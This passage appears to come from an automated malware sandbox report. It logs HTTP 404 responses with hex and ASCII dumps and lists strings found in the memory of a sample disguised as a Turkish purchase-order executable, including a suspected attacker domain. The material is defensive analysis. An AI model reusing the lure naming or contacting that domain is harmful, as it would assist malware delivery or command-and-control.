Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Wed, 03 Jul 2024 15:46:04 GMTContent-Type: text/html; charset=UTF-8Content-Length: 162Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Wed, 03 Jul 2024 15:46:06 GMTContent-Type: text/html; charset=UTF-8Content-Length: 162Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeDate: Wed, 03 Jul 2024 15:46:12 GMTServer: ApacheContent-Encoding: gzipData Raw: 31 38 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f e3 30 10 be f7 57 cc 7a 0f 9c 1c 37 94 43 9b 26 1c b6 ad b4 48 85 45 28 88 e5 68 62 b7 b1 e4 78 82 33 21 0d bf 1e 27 e5 b1 20 b4 27 8f ed ef 31 f3 4d fa 63 fd 67 95 df 5f 6f a0 a4 ca c2 f5 ed af ed c5 0a 18 17 e2 6e b6 12 62 9d af e1 ef ef fc 72 0b 71 34 85 dc 4b d7 18 32 e8 a4 15 62 73 c5 26 ac 24 aa 13 21 ba ae 8b ba 59 84 7e 2f f2 1b 71 18 b4 e2 81 fc 5a 72 fa 87 19 29 52 ec 7c 92 8e 86 56 ba 7d c6 b4 63 70 a8 6c f2 e9 e6 9a ec 1b f9 78 b1 58 1c 55 83 06 a4 a5 96 2a 9c 90 92 21 ab 87 0a 36 de a3 87 b3 e9 19 70 b8 42 82 1d b6 4e 0d 10 f1 8e 49 2b 4d 12 0a 74 a4 1d 65 8c f4 81 c4 d0 ce 12 8a 52 fa 46 53 d6 d2 8e cf 59 08 85 6a ae 1f 5b f3 94 b1 d5 11 ce f3 be d6 83 37 7c 51 71 c8 0b 59 94 fa 33 6b 7c e2 83 95 47 3b b6 2c 5e 7b 4e 1f 50 f5 d0 50 6f 75 c6 76 01 c0 77 b2 32 b6 4f a4 37 d2 2e 8f 16 65 fc 86 28 d0 a2 4f 7e 4e e5 ec 74 5e 2c 47 7c 63 9e 75 12 16 a3 ab 23 fa 3f a3 97 f1 d8 71 fd a6 f6 c1 9f 46 f3 77 fe 3d b6 1e 1e 3c 76 8d f6 50 48 77 12 d2 33 4e 01 95 1a 14 16 6d 15 e2 0a b1 79 af 9b 1a 9d 32 6e 0f 84 e3 ef ed cd 16 7a 6c 81 42 38 0a 8c 8b c6 c0 eb 60 9a 8a 61 ce b0 ef 31 e1 f3 c9 0b 6c 60 6d 75 72 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 189}QKO0Wz7C&HE(hbx3!' '1Mcg_onbrq4K2bs&$!Y~/qZr)R|V}cplxXU*!6pBNI+MteRFSYj[7|QqY3k|G;,^{NPPouvw2O7.e(O~Nt^,G|cu#?qFw=<vPHw3Nmy2nzlB8`a1l`mur0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeDate: Wed, 03 Jul 2024 15:46:14 GMTServer: ApacheContent-Encoding: gzipData Raw: 31 38 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f e3 30 10 be f7 57 cc 7a 0f 9c 1c 37 94 43 9b 26 1c b6 ad b4 48 85 45 28 88 e5 68 62 b7 b1 e4 78 82 33 21 0d bf 1e 27 e5 b1 20 b4 27 8f ed ef 31 f3 4d fa 63 fd 67 95 df 5f 6f a0 a4 ca c2 f5 ed af ed c5 0a 18 17 e2 6e b6 12 62 9d af e1 ef ef fc 72 0b 71 34 85 dc 4b d7 18 32 e8 a4 15 62 73 c5 26 ac 24 aa 13 21 ba ae 8b ba 59 84 7e 2f f2 1b 71 18 b4 e2 81 fc 5a 72 fa 87 19 29 52 ec 7c 92 8e 86 56 ba 7d c6 b4 63 70 a8 6c f2 e9 e6 9a ec 1b f9 78 b1 58 1c 55 83 06 a4 a5 96 2a 9c 90 92 21 ab 87 0a 36 de a3 87 b3 e9 19 70 b8 42 82 1d b6 4e 0d 10 f1 8e 49 2b 4d 12 0a 74 a4 1d 65 8c f4 81 c4 d0 ce 12 8a 52 fa 46 53 d6 d2 8e cf 59 08 85 6a ae 1f 5b f3 94 b1 d5 11 ce f3 be d6 83 37 7c 51 71 c8 0b 59 94 fa 33 6b 7c e2 83 95 47 3b b6 2c 5e 7b 4e 1f 50 f5 d0 50 6f 75 c6 76 01 c0 77 b2 32 b6 4f a4 37 d2 2e 8f 16 65 fc 86 28 d0 a2 4f 7e 4e e5 ec 74 5e 2c 47 7c 63 9e 75 12 16 a3 ab 23 fa 3f a3 97 f1 d8 71 fd a6 f6 c1 9f 46 f3 77 fe 3d b6 1e 1e 3c 76 8d f6 50 48 77 12 d2 33 4e 01 95 1a 14 16 6d 15 e2 0a b1 79 af 9b 1a 9d 32 6e 0f 84 e3 ef ed cd 16 7a 6c 81 42 38 0a 8c 8b c6 c0 eb 60 9a 8a 61 ce b0 ef 31 e1 f3 c9 0b 6c 60 6d 75 72 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 189}QKO0Wz7C&HE(hbx3!' '1Mcg_onbrq4K2bs&$!Y~/qZr)R|V}cplxXU*!6pBNI+MteRFSYj[7|QqY3k|G;,^{NPPouvw2O7.e(O~Nt^,G|cu#?qFw=<vPHw3Nmy2nzlB8`a1l`mur0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeDate: Wed, 03 Jul 2024 15:46:17 GMTServer: ApacheContent-Encoding: gzipData Raw: 31 38 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f e3 30 10 be f7 57 cc 7a 0f 9c 1c 37 94 43 9b 26 1c b6 ad b4 48 85 45 28 88 e5 68 62 b7 b1 e4 78 82 33 21 0d bf 1e 27 e5 b1 20 b4 27 8f ed ef 31 f3 4d fa 63 fd 67 95 df 5f 6f a0 a4 ca c2 f5 ed af ed c5 0a 18 17 e2 6e b6 12 62 9d af e1 ef ef fc 72 0b 71 34 85 dc 4b d7 18 32 e8 a4 15 62 73 c5 26 ac 24 aa 13 21 ba ae 8b ba 59 84 7e 2f f2 1b 71 18 b4 e2 81 fc 5a 72 fa 87 19 29 52 ec 7c 92 8e 86 56 ba 7d c6 b4 63 70 a8 6c f2 e9 e6 9a ec 1b f9 78 b1 58 1c 55 83 06 a4 a5 96 2a 9c 90 92 21 ab 87 0a 36 de a3 87 b3 e9 19 70 b8 42 82 1d b6 4e 0d 10 f1 8e 49 2b 4d 12 0a 74 a4 1d 65 8c f4 81 c4 d0 ce 12 8a 52 fa 46 53 d6 d2 8e cf 59 08 85 6a ae 1f 5b f3 94 b1 d5 11 ce f3 be d6 83 37 7c 51 71 c8 0b 59 94 fa 33 6b 7c e2 83 95 47 3b b6 2c 5e 7b 4e 1f 50 f5 d0 50 6f 75 c6 76 01 c0 77 b2 32 b6 4f a4 37 d2 2e 8f 16 65 fc 86 28 d0 a2 4f 7e 4e e5 ec 74 5e 2c 47 7c 63 9e 75 12 16 a3 ab 23 fa 3f a3 97 f1 d8 71 fd a6 f6 c1 9f 46 f3 77 fe 3d b6 1e 1e 3c 76 8d f6 50 48 77 12 d2 33 4e 01 95 1a 14 16 6d 15 e2 0a b1 79 af 9b 1a 9d 32 6e 0f 84 e3 ef ed cd 16 7a 6c 81 42 38 0a 8c 8b c6 c0 eb 60 9a 8a 61 ce b0 ef 31 e1 f3 c9 0b 6c 60 6d 75 72 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 189}QKO0Wz7C&HE(hbx3!' '1Mcg_onbrq4K2bs&$!Y~/qZr)R|V}cplxXU*!6pBNI+MteRFSYj[7|QqY3k|G;,^{NPPouvw2O7.e(O~Nt^,G|cu#?qFw=<vPHw3Nmy2nzlB8`a1l`mur0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlContent-Length: 626Connection: closeDate: Wed, 03 Jul 2024 15:46:19 GMTServer: ApacheData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 22 3e 0a 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 30 61 33 32 38 63 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 30 65 6d 3b 22 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 68 31 3e 0a 20 20 3c 70 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 30 2e 38 65 6d 3b 22 3e 0a 20 20 20 59 6f 75 72 20 62 72 6f 77 73 65 72 20 63 61 6e 27 74 20 66 69 6e 64 20 74 68 65 20 64 6f 63 75 6d 65 6e 74 20 63 6f 72 72 65 73 70 6f 6e 64 69 6e 67 20 74 6f 20 74 68 65 20 55 52 4c 20 79 6f 75 20 74 79 70 65 64 20 69 6e 2e 0a 20 20 3c 2f 70 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Error 404 - Not found </title> <meta content="text/html; charset=utf-8" http-equiv="Content-Type"> <meta content="no-cache" http-equiv="cache-control"> </head> <body style="font-family:arial;"> <h1 style="color:#0a328c;font-size:1.0em;"> Error 404 - Not found </h1> <p style="font-size:0.8em;"> Your browser can't find the document corresponding to the URL you typed in. </p> </body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 03 Jul 2024 15:46:39 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 03 Jul 2024 15:46:42 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 03 Jul 2024 15:46:45 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 03 Jul 2024 15:46:47 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeDate: Wed, 03 Jul 2024 15:46:53 GMTServer: ApacheContent-Encoding: gzipData Raw: 31 38 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f e3 30 10 be f7 57 cc 7a 0f 9c 1c 37 94 43 9b 26 1c b6 ad b4 48 85 45 28 88 e5 68 62 b7 b1 e4 78 82 33 21 0d bf 1e 27 e5 b1 20 b4 27 8f ed ef 31 f3 4d fa 63 fd 67 95 df 5f 6f a0 a4 ca c2 f5 ed af ed c5 0a 18 17 e2 6e b6 12 62 9d af e1 ef ef fc 72 0b 71 34 85 dc 4b d7 18 32 e8 a4 15 62 73 c5 26 ac 24 aa 13 21 ba ae 8b ba 59 84 7e 2f f2 1b 71 18 b4 e2 81 fc 5a 72 fa 87 19 29 52 ec 7c 92 8e 86 56 ba 7d c6 b4 63 70 a8 6c f2 e9 e6 9a ec 1b f9 78 b1 58 1c 55 83 06 a4 a5 96 2a 9c 90 92 21 ab 87 0a 36 de a3 87 b3 e9 19 70 b8 42 82 1d b6 4e 0d 10 f1 8e 49 2b 4d 12 0a 74 a4 1d 65 8c f4 81 c4 d0 ce 12 8a 52 fa 46 53 d6 d2 8e cf 59 08 85 6a ae 1f 5b f3 94 b1 d5 11 ce f3 be d6 83 37 7c 51 71 c8 0b 59 94 fa 33 6b 7c e2 83 95 47 3b b6 2c 5e 7b 4e 1f 50 f5 d0 50 6f 75 c6 76 01 c0 77 b2 32 b6 4f a4 37 d2 2e 8f 16 65 fc 86 28 d0 a2 4f 7e 4e e5 ec 74 5e 2c 47 7c 63 9e 75 12 16 a3 ab 23 fa 3f a3 97 f1 d8 71 fd a6 f6 c1 9f 46 f3 77 fe 3d b6 1e 1e 3c 76 8d f6 50 48 77 12 d2 33 4e 01 95 1a 14 16 6d 15 e2 0a b1 79 af 9b 1a 9d 32 6e 0f 84 e3 ef ed cd 16 7a 6c 81 42 38 0a 8c 8b c6 c0 eb 60 9a 8a 61 ce b0 ef 31 e1 f3 c9 0b 6c 60 6d 75 72 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 189}QKO0Wz7C&HE(hbx3!' '1Mcg_onbrq4K2bs&$!Y~/qZr)R|V}cplxXU*!6pBNI+MteRFSYj[7|QqY3k|G;,^{NPPouvw2O7.e(O~Nt^,G|cu#?qFw=<vPHw3Nmy2nzlB8`a1l`mur0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeDate: Wed, 03 Jul 2024 15:46:55 GMTServer: ApacheContent-Encoding: gzipData Raw: 31 38 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f e3 30 10 be f7 57 cc 7a 0f 9c 1c 37 94 43 9b 26 1c b6 ad b4 48 85 45 28 88 e5 68 62 b7 b1 e4 78 82 33 21 0d bf 1e 27 e5 b1 20 b4 27 8f ed ef 31 f3 4d fa 63 fd 67 95 df 5f 6f a0 a4 ca c2 f5 ed af ed c5 0a 18 17 e2 6e b6 12 62 9d af e1 ef ef fc 72 0b 71 34 85 dc 4b d7 18 32 e8 a4 15 62 73 c5 26 ac 24 aa 13 21 ba ae 8b ba 59 84 7e 2f f2 1b 71 18 b4 e2 81 fc 5a 72 fa 87 19 29 52 ec 7c 92 8e 86 56 ba 7d c6 b4 63 70 a8 6c f2 e9 e6 9a ec 1b f9 78 b1 58 1c 55 83 06 a4 a5 96 2a 9c 90 92 21 ab 87 0a 36 de a3 87 b3 e9 19 70 b8 42 82 1d b6 4e 0d 10 f1 8e 49 2b 4d 12 0a 74 a4 1d 65 8c f4 81 c4 d0 ce 12 8a 52 fa 46 53 d6 d2 8e cf 59 08 85 6a ae 1f 5b f3 94 b1 d5 11 ce f3 be d6 83 37 7c 51 71 c8 0b 59 94 fa 33 6b 7c e2 83 95 47 3b b6 2c 5e 7b 4e 1f 50 f5 d0 50 6f 75 c6 76 01 c0 77 b2 32 b6 4f a4 37 d2 2e 8f 16 65 fc 86 28 d0 a2 4f 7e 4e e5 ec 74 5e 2c 47 7c 63 9e 75 12 16 a3 ab 23 fa 3f a3 97 f1 d8 71 fd a6 f6 c1 9f 46 f3 77 fe 3d b6 1e 1e 3c 76 8d f6 50 48 77 12 d2 33 4e 01 95 1a 14 16 6d 15 e2 0a b1 79 af 9b 1a 9d 32 6e 0f 84 e3 ef ed cd 16 7a 6c 81 42 38 0a 8c 8b c6 c0 eb 60 9a 8a 61 ce b0 ef 31 e1 f3 c9 0b 6c 60 6d 75 72 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 189}QKO0Wz7C&HE(hbx3!' '1Mcg_onbrq4K2bs&$!Y~/qZr)R|V}cplxXU*!6pBNI+MteRFSYj[7|QqY3k|G;,^{NPPouvw2O7.e(O~Nt^,G|cu#?qFw=<vPHw3Nmy2nzlB8`a1l`mur0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeDate: Wed, 03 Jul 2024 15:46:58 GMTServer: ApacheContent-Encoding: gzipData Raw: 31 38 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f e3 30 10 be f7 57 cc 7a 0f 9c 1c 37 94 43 9b 26 1c b6 ad b4 48 85 45 28 88 e5 68 62 b7 b1 e4 78 82 33 21 0d bf 1e 27 e5 b1 20 b4 27 8f ed ef 31 f3 4d fa 63 fd 67 95 df 5f 6f a0 a4 ca c2 f5 ed af ed c5 0a 18 17 e2 6e b6 12 62 9d af e1 ef ef fc 72 0b 71 34 85 dc 4b d7 18 32 e8 a4 15 62 73 c5 26 ac 24 aa 13 21 ba ae 8b ba 59 84 7e 2f f2 1b 71 18 b4 e2 81 fc 5a 72 fa 87 19 29 52 ec 7c 92 8e 86 56 ba 7d c6 b4 63 70 a8 6c f2 e9 e6 9a ec 1b f9 78 b1 58 1c 55 83 06 a4 a5 96 2a 9c 90 92 21 ab 87 0a 36 de a3 87 b3 e9 19 70 b8 42 82 1d b6 4e 0d 10 f1 8e 49 2b 4d 12 0a 74 a4 1d 65 8c f4 81 c4 d0 ce 12 8a 52 fa 46 53 d6 d2 8e cf 59 08 85 6a ae 1f 5b f3 94 b1 d5 11 ce f3 be d6 83 37 7c 51 71 c8 0b 59 94 fa 33 6b 7c e2 83 95 47 3b b6 2c 5e 7b 4e 1f 50 f5 d0 50 6f 75 c6 76 01 c0 77 b2 32 b6 4f a4 37 d2 2e 8f 16 65 fc 86 28 d0 a2 4f 7e 4e e5 ec 74 5e 2c 47 7c 63 9e 75 12 16 a3 ab 23 fa 3f a3 97 f1 d8 71 fd a6 f6 c1 9f 46 f3 77 fe 3d b6 1e 1e 3c 76 8d f6 50 48 77 12 d2 33 4e 01 95 1a 14 16 6d 15 e2 0a b1 79 af 9b 1a 9d 32 6e 0f 84 e3 ef ed cd 16 7a 6c 81 42 38 0a 8c 8b c6 c0 eb 60 9a 8a 61 ce b0 ef 31 e1 f3 c9 0b 6c 60 6d 75 72 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 189}QKO0Wz7C&HE(hbx3!' '1Mcg_onbrq4K2bs&$!Y~/qZr)R|V}cplxXU*!6pBNI+MteRFSYj[7|QqY3k|G;,^{NPPouvw2O7.e(O~Nt^,G|cu#?qFw=<vPHw3Nmy2nzlB8`a1l`mur0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlContent-Length: 626Connection: closeDate: Wed, 03 Jul 2024 15:47:00 GMTServer: ApacheData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 22 3e 0a 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 30 61 33 32 38 63 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 30 65 6d 3b 22 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 68 31 3e 0a 20 20 3c 70 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 30 2e 38 65 6d 3b 22 3e 0a 20 20 20 59 6f 75 72 20 62 72 6f 77 73 65 72 20 63 61 6e 27 74 20 66 69 6e 64 20 74 68 65 20 64 6f 63 75 6d 65 6e 74 20 63 6f 72 72 65 73 70 6f 6e 64 69 6e 67 20 74 6f 20 74 68 65 20 55 52 4c 20 79 6f 75 20 74 79 70 65 64 20 69 6e 2e 0a 20 20 3c 2f 70 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Error 404 - Not found </title> <meta content="text/html; charset=utf-8" http-equiv="Content-Type"> <meta content="no-cache" http-equiv="cache-control"> </head> <body style="font-family:arial;"> <h1 style="color:#0a328c;font-size:1.0em;"> Error 404 - Not found </h1> <p style="font-size:0.8em;"> Your browser can't find the document corresponding to the URL you typed in. </p> </body></html>
            Source: fc.exe, 00000009.00000002.4153435982.0000000003DCC000.00000004.10000000.00040000.00000000.sdmp, akwoJPEqdiyPQmCnaGzo.exe, 0000000B.00000002.4152791515.00000000036BC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://goge8opp.com:301
            Source: 03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe, 00000000.00000002.1685588395.0000000002E8D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: 03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe, 00000000.00000002.1720594400.00000000071B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
